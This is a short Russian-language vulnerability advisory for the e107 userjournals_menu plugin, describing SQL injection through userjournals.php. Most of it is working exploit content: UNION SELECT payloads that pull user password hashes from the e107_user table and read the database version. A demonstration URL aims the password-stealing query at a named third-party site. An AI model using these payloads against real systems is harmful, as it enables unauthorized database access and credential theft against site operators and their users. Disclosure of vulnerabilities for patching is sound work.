Программа: e107 Plugin userjournals_menu
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием userjournals.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.
Эксплоит:
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[exploit]
-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from
e107_user--
-9999 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
Демонстрация:
http://demo.infozonelab.com/plugins/userjournals_menu/userjournals.php?blog.-9999
union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
